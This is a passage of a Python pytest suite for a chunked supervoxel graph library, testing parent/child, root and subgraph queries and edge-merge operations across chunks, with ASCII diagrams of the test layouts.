# (non-existing) Children of L1
assert np.array_equal(children10000, []) is True
assert np.array_equal(children11000, []) is True
assert np.array_equal(children11001, []) is True
assert np.array_equal(children12000, []) is True
# Parent of L1
assert parent10000 == to_label(cgraph, 2, 0, 0, 0, 1)
assert parent11000 == to_label(cgraph, 2, 1, 0, 0, 1)
assert parent11001 == to_label(cgraph, 2, 1, 0, 0, 1)
assert parent12000 == to_label(cgraph, 2, 2, 0, 0, 1)
# Children of L2
assert len(children20001) == 1 and to_label(cgraph, 1, 0, 0, 0, 0) in children20001
assert len(children21001) == 2 and to_label(cgraph, 1, 1, 0, 0, 0) in children21001 and to_label(cgraph, 1, 1, 0, 0, 1) in children21001
assert len(children22001) == 1 and to_label(cgraph, 1, 2, 0, 0, 0) in children22001
# Parent of L2
assert parent20001 == to_label(cgraph, 3, 0, 0, 0, 1) and parent21001 == to_label(cgraph, 3, 0, 0, 0, 2) or \
parent20001 == to_label(cgraph, 3, 0, 0, 0, 2) and parent21001 == to_label(cgraph, 3, 0, 0, 0, 1)
assert parent22001 == to_label(cgraph, 3, 1, 0, 0, 1)
# Children of L3
assert len(children30001) == 1 and len(children30002) == 1 and len(children31001) == 1
assert to_label(cgraph, 2, 0, 0, 0, 1) in children30001 and to_label(cgraph, 2, 1, 0, 0, 1) in children30002 or \
to_label(cgraph, 2, 0, 0, 0, 1) in children30002 and to_label(cgraph, 2, 1, 0, 0, 1) in children30001
assert to_label(cgraph, 2, 2, 0, 0, 1) in children31001
# Parent of L3
assert parent30001 == parent31001 or parent30002 == parent31001
assert (parent30001 == to_label(cgraph, 4, 0, 0, 0, 1) and parent30002 == to_label(cgraph, 4, 0, 0, 0, 2)) or \
(parent30001 == to_label(cgraph, 4, 0, 0, 0, 2) and parent30002 == to_label(cgraph, 4, 0, 0, 0, 1))
# Children of L4
if len(children40001) == 1:
assert parent20001 in children40001
assert len(children40002) == 2 and parent21001 in children40002 and parent22001 in children40002
elif len(children40001) == 2:
assert parent21001 in children40001 and parent22001 in children40001
assert len(children40002) == 1 and parent20001 in children40002
# (non-existing) Parent of L4
assert parent40001 is None
assert parent40002 is None
# # Children of (non-existing) L5
# with pytest.raises(IndexError):
# cgraph.get_children(to_label(cgraph, 5, 0, 0, 0, 1))
# # Parent of (non-existing) L5
# with pytest.raises(IndexError):
# cgraph.get_parent(to_label(cgraph, 5, 0, 0, 0, 1), get_only_relevant_parent=True, time_stamp=None)
children2_separate = cgraph.get_children([to_label(cgraph, 2, 0, 0, 0, 1),
to_label(cgraph, 2, 1, 0, 0, 1),
to_label(cgraph, 2, 2, 0, 0, 1)])
assert len(children2_separate) == 3
assert to_label(cgraph, 2, 0, 0, 0, 1) in children2_separate and \
np.all(np.isin(children2_separate[to_label(cgraph, 2, 0, 0, 0, 1)], children20001))
assert to_label(cgraph, 2, 1, 0, 0, 1) in children2_separate and \
np.all(np.isin(children2_separate[to_label(cgraph, 2, 1, 0, 0, 1)], children21001))
assert to_label(cgraph, 2, 2, 0, 0, 1) in children2_separate and \
np.all(np.isin(children2_separate[to_label(cgraph, 2, 2, 0, 0, 1)], children22001))
children2_combined = cgraph.get_children([to_label(cgraph, 2, 0, 0, 0, 1),
to_label(cgraph, 2, 1, 0, 0, 1),
to_label(cgraph, 2, 2, 0, 0, 1)], flatten=True)
assert len(children2_combined) == 4 and \
np.all(np.isin(children20001, children2_combined)) and \
np.all(np.isin(children21001, children2_combined)) and \
np.all(np.isin(children22001, children2_combined))
@pytest.mark.timeout(30)
def test_get_root(self, gen_graph_simplequerytest):
cgraph = gen_graph_simplequerytest
root10000 = cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0),
time_stamp=None)
root11000 = cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 0),
time_stamp=None)
root11001 = cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 1),
time_stamp=None)
root12000 = cgraph.get_root(to_label(cgraph, 1, 2, 0, 0, 0),
time_stamp=None)
with pytest.raises(Exception) as e:
cgraph.get_root(0)
assert (root10000 == to_label(cgraph, 4, 0, 0, 0, 1) and
root11000 == root11001 == root12000 == to_label(
cgraph, 4, 0, 0, 0, 2)) or \
(root10000 == to_label(cgraph, 4, 0, 0, 0, 2) and
root11000 == root11001 == root12000 == to_label(
cgraph, 4, 0, 0, 0, 1))
@pytest.mark.timeout(30)
def test_get_subgraph_nodes(self, gen_graph_simplequerytest):
cgraph = gen_graph_simplequerytest
root1 = cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0))
root2 = cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 0))
lvl1_nodes_1 = cgraph.get_subgraph_nodes(root1)
lvl1_nodes_2 = cgraph.get_subgraph_nodes(root2)
assert len(lvl1_nodes_1) == 1
assert len(lvl1_nodes_2) == 3
assert to_label(cgraph, 1, 0, 0, 0, 0) in lvl1_nodes_1
assert to_label(cgraph, 1, 1, 0, 0, 0) in lvl1_nodes_2
assert to_label(cgraph, 1, 1, 0, 0, 1) in lvl1_nodes_2
assert to_label(cgraph, 1, 2, 0, 0, 0) in lvl1_nodes_2
lvl2_nodes_1 = cgraph.get_subgraph_nodes(root1, return_layers=[2])
lvl2_nodes_2 = cgraph.get_subgraph_nodes(root2, return_layers=[2])
assert len(lvl2_nodes_1) == 1
assert len(lvl2_nodes_2) == 2
assert to_label(cgraph, 2, 0, 0, 0, 1) in lvl2_nodes_1
assert to_label(cgraph, 2, 1, 0, 0, 1) in lvl2_nodes_2
assert to_label(cgraph, 2, 2, 0, 0, 1) in lvl2_nodes_2
lvl3_nodes_1 = cgraph.get_subgraph_nodes(root1, return_layers=[3])
lvl3_nodes_2 = cgraph.get_subgraph_nodes(root2, return_layers=[3])
assert len(lvl3_nodes_1) == 1
assert len(lvl3_nodes_2) == 2
assert to_label(cgraph, 3, 0, 0, 0, 1) in lvl3_nodes_1
assert to_label(cgraph, 3, 0, 0, 0, 2) in lvl3_nodes_2
assert to_label(cgraph, 3, 1, 0, 0, 1) in lvl3_nodes_2
lvl4_node = cgraph.get_subgraph_nodes(root1, return_layers=[4])
assert len(lvl4_node) == 1
assert root1 in lvl4_node
layers = cgraph.get_subgraph_nodes(root2, return_layers=[1, 4])
assert len(layers) == 2 and 1 in layers and 4 in layers
assert len(layers[4]) == 1 and root2 in layers[4]
assert len(layers[1]) == 3
assert to_label(cgraph, 1, 1, 0, 0, 0) in layers[1]
assert to_label(cgraph, 1, 1, 0, 0, 1) in layers[1]
assert to_label(cgraph, 1, 2, 0, 0, 0) in layers[1]
lvl2_nodes = cgraph.get_subgraph_nodes(root2, return_layers=[2],
bounding_box=[[1, 0, 0], [2, 1, 1]],
bb_is_coordinate=False)
assert len(lvl2_nodes) == 1
assert to_label(cgraph, 2, 1, 0, 0, 1) in lvl2_nodes
lvl2_parent = cgraph.get_parent(to_label(cgraph, 1, 1, 0, 0, 0))
lvl1_nodes = cgraph.get_subgraph_nodes(lvl2_parent)
assert len(lvl1_nodes) == 2
assert to_label(cgraph, 1, 1, 0, 0, 0) in lvl1_nodes
assert to_label(cgraph, 1, 1, 0, 0, 1) in lvl1_nodes
@pytest.mark.timeout(30)
def test_get_subgraph_edges(self, gen_graph_simplequerytest):
cgraph = gen_graph_simplequerytest
root1 = cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0))
root2 = cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 0))
edges, affinities, areas = cgraph.get_subgraph_edges(root1)
assert len(edges) == 0 and len(affinities) == 0 and len(areas) == 0
edges, affinities, areas = cgraph.get_subgraph_edges(root2)
assert [to_label(cgraph, 1, 1, 0, 0, 0),
to_label(cgraph, 1, 1, 0, 0, 1)] in edges or \
[to_label(cgraph, 1, 1, 0, 0, 1),
to_label(cgraph, 1, 1, 0, 0, 0)] in edges
assert [to_label(cgraph, 1, 1, 0, 0, 0),
to_label(cgraph, 1, 2, 0, 0, 0)] in edges or \
[to_label(cgraph, 1, 2, 0, 0, 0),
to_label(cgraph, 1, 1, 0, 0, 0)] in edges
# assert len(edges) == 2 and len(affinities) == 2 and len(areas) == 2
lvl2_parent = cgraph.get_parent(to_label(cgraph, 1, 1, 0, 0, 0))
edges, affinities, areas = cgraph.get_subgraph_edges(lvl2_parent)
assert [to_label(cgraph, 1, 1, 0, 0, 0),
to_label(cgraph, 1, 1, 0, 0, 1)] in edges or \
[to_label(cgraph, 1, 1, 0, 0, 1),
to_label(cgraph, 1, 1, 0, 0, 0)] in edges
assert [to_label(cgraph, 1, 1, 0, 0, 0),
to_label(cgraph, 1, 2, 0, 0, 0)] in edges or \
[to_label(cgraph, 1, 2, 0, 0, 0),
to_label(cgraph, 1, 1, 0, 0, 0)] in edges
assert len(edges) == 2
@pytest.mark.timeout(30)
def test_get_subgraph_nodes_bb(self, gen_graph_simplequerytest):
cgraph = gen_graph_simplequerytest
bb = np.array([[1, 0, 0], [2, 1, 1]], dtype=np.int)
bb_coord = bb * cgraph.chunk_size
childs_1 = cgraph.get_subgraph_nodes(cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 1)), bounding_box=bb)
childs_2 = cgraph.get_subgraph_nodes(cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 1)), bounding_box=bb_coord, bb_is_coordinate=True)
assert np.all(~(np.sort(childs_1) - np.sort(childs_2)))
@pytest.mark.timeout(30)
def test_get_atomic_partners(self, gen_graph_simplequerytest):
cgraph = gen_graph_simplequerytest
class TestGraphMerge:
@pytest.mark.timeout(30)
def test_merge_pair_same_chunk(self, gen_graph):
"""
Add edge between existing RG supervoxels 1 and 2 (same chunk)
Expected: Same (new) parent for RG 1 and 2 on Layer two
┌─────┐ ┌─────┐
│ A¹ │ │ A¹ │
│ 1 2 │ => │ 1━2 │
│ │ │ │
└─────┘ └─────┘
"""
cgraph = gen_graph(n_layers=2)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1)],
edges=[],
timestamp=fake_timestamp)
# Merge
new_root_ids = cgraph.add_edges("Jane Doe", [to_label(cgraph, 1, 0, 0, 0, 1), to_label(cgraph, 1, 0, 0, 0, 0)], affinities=0.3)
assert len(new_root_ids) == 1
new_root_id = new_root_ids[0]
# Check
assert cgraph.get_parent(to_label(cgraph, 1, 0, 0, 0, 0)) == new_root_id
assert cgraph.get_parent(to_label(cgraph, 1, 0, 0, 0, 1)) == new_root_id
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 0))
assert partners[0] == to_label(cgraph, 1, 0, 0, 0, 1) and affinities[0] == np.float32(0.3)
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 1))
assert partners[0] == to_label(cgraph, 1, 0, 0, 0, 0) and affinities[0] == np.float32(0.3)
leaves = np.unique(cgraph.get_subgraph_nodes(new_root_id))
assert len(leaves) == 2
assert to_label(cgraph, 1, 0, 0, 0, 0) in leaves
assert to_label(cgraph, 1, 0, 0, 0, 1) in leaves
@pytest.mark.timeout(30)
def test_merge_pair_neighboring_chunks(self, gen_graph):
"""
Add edge between existing RG supervoxels 1 and 2 (neighboring chunks)
┌─────┬─────┐ ┌─────┬─────┐
│ A¹ │ B¹ │ │ A¹ │ B¹ │
│ 1 │ 2 │ => │ 1━━┿━━2 │
│ │ │ │ │ │
└─────┴─────┘ └─────┴─────┘
"""
cgraph = gen_graph(n_layers=3)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0)],
edges=[],
timestamp=fake_timestamp)
# Preparation: Build Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 0, 0, 0)],
edges=[],
timestamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0]]), time_stamp=fake_timestamp)
# Merge
new_root_ids = cgraph.add_edges("Jane Doe", [to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 0)], affinities=0.3)
assert len(new_root_ids) == 1
new_root_id = new_root_ids[0]
# Check
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0)) == new_root_id
assert cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 0)) == new_root_id
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 0))
assert partners[0] == to_label(cgraph, 1, 1, 0, 0, 0) and affinities[0] == np.float32(0.3)
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 1, 0, 0, 0))
assert partners[0] == to_label(cgraph, 1, 0, 0, 0, 0) and affinities[0] == np.float32(0.3)
leaves = np.unique(cgraph.get_subgraph_nodes(new_root_id))
assert len(leaves) == 2
assert to_label(cgraph, 1, 0, 0, 0, 0) in leaves
assert to_label(cgraph, 1, 1, 0, 0, 0) in leaves
@pytest.mark.timeout(30)
def test_merge_pair_disconnected_chunks(self, gen_graph):
"""
Add edge between existing RG supervoxels 1 and 2 (disconnected chunks)
┌─────┐ ┌─────┐ ┌─────┐ ┌─────┐
│ A¹ │ ... │ Z¹ │ │ A¹ │ ... │ Z¹ │
│ 1 │ │ 2 │ => │ 1━━┿━━━━━┿━━2 │
│ │ │ │ │ │ │ │
└─────┘ └─────┘ └─────┘ └─────┘
"""
cgraph = gen_graph(n_layers=9)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0)],
edges=[],
timestamp=fake_timestamp)
# Preparation: Build Chunk Z
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 127, 127, 127, 0)],
edges=[],
timestamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0x00, 0x00, 0x00]]), time_stamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0x7F, 0x7F, 0x7F]]), time_stamp=fake_timestamp)
cgraph.add_layer(4, np.array([[0x00, 0x00, 0x00]]), time_stamp=fake_timestamp)
cgraph.add_layer(4, np.array([[0x3F, 0x3F, 0x3F]]), time_stamp=fake_timestamp)
cgraph.add_layer(5, np.array([[0x00, 0x00, 0x00]]), time_stamp=fake_timestamp)
cgraph.add_layer(5, np.array([[0x1F, 0x1F, 0x1F]]), time_stamp=fake_timestamp)
cgraph.add_layer(6, np.array([[0x00, 0x00, 0x00]]), time_stamp=fake_timestamp)
cgraph.add_layer(6, np.array([[0x0F, 0x0F, 0x0F]]), time_stamp=fake_timestamp)
cgraph.add_layer(7, np.array([[0x00, 0x00, 0x00]]), time_stamp=fake_timestamp)
cgraph.add_layer(7, np.array([[0x07, 0x07, 0x07]]), time_stamp=fake_timestamp)
cgraph.add_layer(8, np.array([[0x00, 0x00, 0x00]]), time_stamp=fake_timestamp)
cgraph.add_layer(8, np.array([[0x03, 0x03, 0x03]]), time_stamp=fake_timestamp)
cgraph.add_layer(9, np.array([[0x00, 0x00, 0x00], [0x01, 0x01, 0x01]]), time_stamp=fake_timestamp)
# Merge
new_root_ids = cgraph.add_edges("Jane Doe", [to_label(cgraph, 1, 127, 127, 127, 0), to_label(cgraph, 1, 0, 0, 0, 0)], affinities=0.3)
assert len(new_root_ids) == 1
new_root_id = new_root_ids[0]
# Check
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0)) == new_root_id
assert cgraph.get_root(to_label(cgraph, 1, 127, 127, 127, 0)) == new_root_id
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 0))
assert partners[0] == to_label(cgraph, 1, 127, 127, 127, 0) and affinities[0] == np.float32(0.3)
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 127, 127, 127, 0))
assert partners[0] == to_label(cgraph, 1, 0, 0, 0, 0) and affinities[0] == np.float32(0.3)
leaves = np.unique(cgraph.get_subgraph_nodes(new_root_id))
assert len(leaves) == 2
assert to_label(cgraph, 1, 0, 0, 0, 0) in leaves
assert to_label(cgraph, 1, 127, 127, 127, 0) in leaves
@pytest.mark.timeout(30)
def test_merge_pair_already_connected(self, gen_graph):
"""
Add edge between already connected RG supervoxels 1 and 2 (same chunk).
Expected: No change, i.e. same parent (to_label(cgraph, 2, 0, 0, 0, 1)), affinity (0.5) and timestamp as before
┌─────┐ ┌─────┐
│ A¹ │ │ A¹ │
│ 1━2 │ => │ 1━2 │
│ │ │ │
└─────┘ └─────┘
"""
cgraph = gen_graph(n_layers=2)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1)],
edges=[(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1), 0.5)],
timestamp=fake_timestamp)
res_old = cgraph.table.read_rows()
res_old.consume_all()
# Merge
cgraph.add_edges("Jane Doe", [to_label(cgraph, 1, 0, 0, 0, 1), to_label(cgraph, 1, 0, 0, 0, 0)])
res_new = cgraph.table.read_rows()
res_new.consume_all()
# Check
if res_old.rows != res_new.rows:
warn("Rows were modified when merging a pair of already connected supervoxels. "
"While probably not an error, it is an unnecessary operation.")
@pytest.mark.timeout(30)
def test_merge_triple_chain_to_full_circle_same_chunk(self, gen_graph):
"""
Add edge between indirectly connected RG supervoxels 1 and 2 (same chunk)
┌─────┐ ┌─────┐
│ A¹ │ │ A¹ │
│ 1 2 │ => │ 1━2 │
│ ┗3┛ │ │ ┗3┛ │
└─────┘ └─────┘
"""
cgraph = gen_graph(n_layers=2)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1), to_label(cgraph, 1, 0, 0, 0, 2)],
edges=[(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 2), 0.5),
(to_label(cgraph, 1, 0, 0, 0, 1), to_label(cgraph, 1, 0, 0, 0, 2), 0.5)],
timestamp=fake_timestamp)
# Merge
new_root_ids = cgraph.add_edges("Jane Doe", [to_label(cgraph, 1, 0, 0, 0, 1), to_label(cgraph, 1, 0, 0, 0, 0)], affinities=0.3)
assert len(new_root_ids) == 1
new_root_id = new_root_ids[0]
# Check
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0)) == new_root_id
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 1)) == new_root_id
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 2)) == new_root_id
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 0))
assert len(partners) == 2
assert to_label(cgraph, 1, 0, 0, 0, 1) in partners
assert to_label(cgraph, 1, 0, 0, 0, 2) in partners
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 1))
assert len(partners) == 2
assert to_label(cgraph, 1, 0, 0, 0, 0) in partners
assert to_label(cgraph, 1, 0, 0, 0, 2) in partners
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 2))
assert len(partners) == 2
assert to_label(cgraph, 1, 0, 0, 0, 0) in partners
assert to_label(cgraph, 1, 0, 0, 0, 1) in partners
leaves = np.unique(cgraph.get_subgraph_nodes(new_root_id))
assert len(leaves) == 3
assert to_label(cgraph, 1, 0, 0, 0, 0) in leaves
assert to_label(cgraph, 1, 0, 0, 0, 1) in leaves
assert to_label(cgraph, 1, 0, 0, 0, 2) in leaves
@pytest.mark.timeout(30)
def test_merge_triple_chain_to_full_circle_neighboring_chunks(self, gen_graph):
"""
Add edge between indirectly connected RG supervoxels 1 and 2 (neighboring chunks)
┌─────┬─────┐ ┌─────┬─────┐
│ A¹ │ B¹ │ │ A¹ │ B¹ │
│ 1 │ 2 │ => │ 1━━┿━━2 │
│ ┗3━┿━━┛ │ │ ┗3━┿━━┛ │
└─────┴─────┘ └─────┴─────┘
"""
cgraph = gen_graph(n_layers=3)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1)],
edges=[(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1), 0.5),
(to_label(cgraph, 1, 0, 0, 0, 1), to_label(cgraph, 1, 1, 0, 0, 0), inf)],
timestamp=fake_timestamp)
# Preparation: Build Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 0, 0, 0)],
edges=[(to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1), inf)],
timestamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0]]), time_stamp=fake_timestamp)
# Merge
new_root_ids = cgraph.add_edges("Jane Doe", [to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 0)], affinities=1.0)
assert len(new_root_ids) == 1
new_root_id = new_root_ids[0]
# Check
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0)) == new_root_id
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 1)) == new_root_id
assert cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 0)) == new_root_id
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 0))
assert len(partners) == 2
assert to_label(cgraph, 1, 0, 0, 0, 1) in partners
assert to_label(cgraph, 1, 1, 0, 0, 0) in partners
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 1))
assert len(partners) == 2
assert to_label(cgraph, 1, 0, 0, 0, 0) in partners
assert to_label(cgraph, 1, 1, 0, 0, 0) in partners
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 1, 0, 0, 0))
assert len(partners) == 2
assert to_label(cgraph, 1, 0, 0, 0, 0) in partners
assert to_label(cgraph, 1, 0, 0, 0, 1) in partners
leaves = np.unique(cgraph.get_subgraph_nodes(new_root_id))
assert len(leaves) == 3
assert to_label(cgraph, 1, 0, 0, 0, 0) in leaves
assert to_label(cgraph, 1, 0, 0, 0, 1) in leaves
assert to_label(cgraph, 1, 1, 0, 0, 0) in leaves
cross_edge_dict_layers = graph_tests.root_cross_edge_test(new_root_id, cg=cgraph) # dict: layer -> cross_edge_dict
n_cross_edges_layer = collections.defaultdict(list)
for child_layer in cross_edge_dict_layers.keys():
for layer in cross_edge_dict_layers[child_layer].keys():
n_cross_edges_layer[layer].append(len(cross_edge_dict_layers[child_layer][layer]))
for layer in n_cross_edges_layer.keys():
assert len(np.unique(n_cross_edges_layer[layer])) == 1
@pytest.mark.timeout(30)
def test_merge_triple_chain_to_full_circle_disconnected_chunks(self, gen_graph):
"""
Add edge between indirectly connected RG supervoxels 1 and 2 (disconnected chunks)
┌─────┐ ┌─────┐ ┌─────┐ ┌─────┐
│ A¹ │ ... │ Z¹ │ │ A¹ │ ... │ Z¹ │
│ 1 │ │ 2 │ => │ 1━━┿━━━━━┿━━2 │
│ ┗3━┿━━━━━┿━━┛ │ │ ┗3━┿━━━━━┿━━┛ │
└─────┘ └─────┘ └─────┘ └─────┘
"""
cgraph = gen_graph(n_layers=9)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1)],
edges=[(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1), 0.5),
(to_label(cgraph, 1, 0, 0, 0, 1), to_label(cgraph, 1, 127, 127, 127, 0), inf)],
timestamp=fake_timestamp)
# Preparation: Build Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 127, 127, 127, 0)],
edges=[(to_label(cgraph, 1, 127, 127, 127, 0), to_label(cgraph, 1, 0, 0, 0, 1), inf)],
timestamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0x00, 0x00, 0x00]]), time_stamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0x7F, 0x7F, 0x7F]]), time_stamp=fake_timestamp)
cgraph.add_layer(4, np.array([[0x00, 0x00, 0x00]]), time_stamp=fake_timestamp)
cgraph.add_layer(4, np.array([[0x3F, 0x3F, 0x3F]]), time_stamp=fake_timestamp)
cgraph.add_layer(5, np.array([[0x00, 0x00, 0x00]]), time_stamp=fake_timestamp)
cgraph.add_layer(5, np.array([[0x1F, 0x1F, 0x1F]]), time_stamp=fake_timestamp)
cgraph.add_layer(6, np.array([[0x00, 0x00, 0x00]]), time_stamp=fake_timestamp)
cgraph.add_layer(6, np.array([[0x0F, 0x0F, 0x0F]]), time_stamp=fake_timestamp)
cgraph.add_layer(7, np.array([[0x00, 0x00, 0x00]]), time_stamp=fake_timestamp)
cgraph.add_layer(7, np.array([[0x07, 0x07, 0x07]]), time_stamp=fake_timestamp)
cgraph.add_layer(8, np.array([[0x00, 0x00, 0x00]]), time_stamp=fake_timestamp)
cgraph.add_layer(8, np.array([[0x03, 0x03, 0x03]]), time_stamp=fake_timestamp)
cgraph.add_layer(9, np.array([[0x00, 0x00, 0x00], [0x01, 0x01, 0x01]]), time_stamp=fake_timestamp)
# Merge
new_root_ids = cgraph.add_edges("Jane Doe", [to_label(cgraph, 1, 127, 127, 127, 0), to_label(cgraph, 1, 0, 0, 0, 0)], affinities=1.0)
assert len(new_root_ids) == 1
new_root_id = new_root_ids[0]
# Check
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0)) == new_root_id
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 1)) == new_root_id
assert cgraph.get_root(to_label(cgraph, 1, 127, 127, 127, 0)) == new_root_id
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 0))
assert len(partners) == 2
assert to_label(cgraph, 1, 0, 0, 0, 1) in partners
assert to_label(cgraph, 1, 127, 127, 127, 0) in partners
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 1))
assert len(partners) == 2
assert to_label(cgraph, 1, 0, 0, 0, 0) in partners
assert to_label(cgraph, 1, 127, 127, 127, 0) in partners
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 127, 127, 127, 0))
assert len(partners) == 2
assert to_label(cgraph, 1, 0, 0, 0, 0) in partners
assert to_label(cgraph, 1, 0, 0, 0, 1) in partners
leaves = np.unique(cgraph.get_subgraph_nodes(new_root_id))
assert len(leaves) == 3
assert to_label(cgraph, 1, 0, 0, 0, 0) in leaves
assert to_label(cgraph, 1, 0, 0, 0, 1) in leaves
assert to_label(cgraph, 1, 127, 127, 127, 0) in leaves
cross_edge_dict_layers = graph_tests.root_cross_edge_test(new_root_id, cg=cgraph) # dict: layer -> cross_edge_dict
n_cross_edges_layer = collections.defaultdict(list)
for child_layer in cross_edge_dict_layers.keys():
for layer in cross_edge_dict_layers[child_layer].keys():
n_cross_edges_layer[layer].append(len(cross_edge_dict_layers[child_layer][layer]))
for layer in n_cross_edges_layer.keys():
assert len(np.unique(n_cross_edges_layer[layer])) == 1
@pytest.mark.timeout(30)
def test_merge_same_node(self, gen_graph):
"""
Try to add loop edge between RG supervoxel 1 and itself
┌─────┐
│ A¹ │
│ 1 │ => Reject
│ │
└─────┘
"""
cgraph = gen_graph(n_layers=2)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0)],
edges=[],
timestamp=fake_timestamp)
res_old = cgraph.table.read_rows()
res_old.consume_all()
# Merge
assert cgraph.add_edges("Jane Doe", [to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 0)]) is None
res_new = cgraph.table.read_rows()
res_new.consume_all()
assert res_new.rows == res_old.rows
@pytest.mark.timeout(30)
def test_merge_pair_abstract_nodes(self, gen_graph):
"""
Try to add edge between RG supervoxel 1 and abstract node "2"
┌─────┐
│ B² │
│ "2" │
│ │
└─────┘
┌─────┐ => Reject
│ A¹ │
│ 1 │
│ │
└─────┘
"""
cgraph = gen_graph(n_layers=3)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0)],
edges=[],
timestamp=fake_timestamp)
# Preparation: Build Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 0, 0, 0)],
edges=[],
timestamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0]]), time_stamp=fake_timestamp)
res_old = cgraph.table.read_rows()
res_old.consume_all()
# Merge
assert cgraph.add_edges("Jane Doe", [to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 2, 1, 0, 0, 1)]) is None
res_new = cgraph.table.read_rows()
res_new.consume_all()
assert res_new.rows == res_old.rows
@pytest.mark.timeout(30)
def test_diagonal_connections(self, gen_graph):
"""
Create graph with edge between RG supervoxels 1 and 2 (same chunk)
and edge between RG supervoxels 1 and 3 (neighboring chunks)
┌─────┬─────┐
│ A¹ │ B¹ │
│ 2 1━┿━━3 │
│ / │ │
┌─────┬─────┐
│ | │ │
│ 4━━┿━━5 │
│ C¹ │ D¹ │
└─────┴─────┘
"""
cgraph = gen_graph(n_layers=3)
# Chunk A
create_chunk(cgraph,
